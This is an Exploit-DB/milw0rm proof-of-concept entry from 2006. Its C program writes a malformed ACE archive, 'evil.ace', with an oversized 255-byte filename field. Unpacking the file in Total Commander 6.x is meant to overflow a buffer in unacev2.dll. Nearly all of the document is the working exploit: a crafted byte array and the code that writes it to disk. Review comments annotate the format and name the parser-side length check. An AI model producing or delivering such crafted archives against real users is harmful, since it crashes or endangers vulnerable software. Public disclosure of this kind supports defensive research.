Total Commander 6.x - 'unacev2.dll' Buffer Overflow (PoC)

EDB-ID:

1633

Author:

darkeagle

Type:

dos

Platform:

Windows

Published:

2006-04-02

/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	once the file has been created, open the archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

/*
 * Raw bytes of the malformed ACE archive that main() writes to disk.
 *
 * What the bytes themselves show:
 *   - "\x2A\x2A\x41\x43\x45\x2A\x2A" is the ASCII string "**ACE**".
 *   - "\x16" is followed by the 22 ASCII bytes "*UNREGISTERED VERSION*".
 *   - The pair "\xFF\x00" directly before the 0x61 run reads as 255 when
 *     taken as a little-endian 16-bit value, and exactly 255 bytes follow
 *     it: 251 x 'a' (0x61) plus ".txt" ("\x2E\x74\x78\x74").
 *   - The array holds 343 data bytes; the string literal adds one implicit
 *     NUL, so sizeof(evil_ace) is 344.
 *
 * NOTE(review): read against the commonly documented ACE layout, this looks
 * like a main header (size field 0x0031) followed by one file header (size
 * field 0x011E) whose filename-length field is 0x00FF -- confirm against a
 * format reference before relying on the field names.
 *
 * NOTE(review): the page only says "Buffer Overflow" in unacev2.dll on
 * unpack; presumably the 255-byte filename is the oversized field, but the
 * size of the destination buffer is not shown here. For triage, the
 * filename-length field and the long run of 0x61 are the distinguishing
 * features of this sample; on the parser side the matching check is to
 * validate the declared filename length against the destination buffer
 * before copying.
 */
unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


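/*
 * Write the evil_ace byte array to "evil.ace" in the current working
 * directory, overwriting any existing file of that name.
 *
 * Returns 0 when every byte was written and the stream closed cleanly,
 * 1 on any I/O failure (the reason is reported on stderr via perror).
 */
int main(void)
{
	/*
	 * evil_ace is initialised from a string literal, so sizeof includes the
	 * implicit trailing NUL; that byte is not part of the archive.
	 */
	const size_t ace_len = sizeof(evil_ace) - 1;
	FILE *ace = fopen("evil.ace", "w+b");

	/* fopen fails on e.g. a read-only directory; passing NULL on is UB. */
	if (ace == NULL) {
		perror("evil.ace");
		return 1;
	}

	/* A short write would leave a truncated sample that tests nothing. */
	if (fwrite(evil_ace, 1, ace_len, ace) != ace_len) {
		perror("evil.ace");
		fclose(ace);
		return 1;
	}

	/* fclose flushes buffered data, so a failure here is also a write error. */
	if (fclose(ace) != 0) {
		perror("evil.ace");
		return 1;
	}

	return 0;
}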

// milw0rm.com [2006-04-02]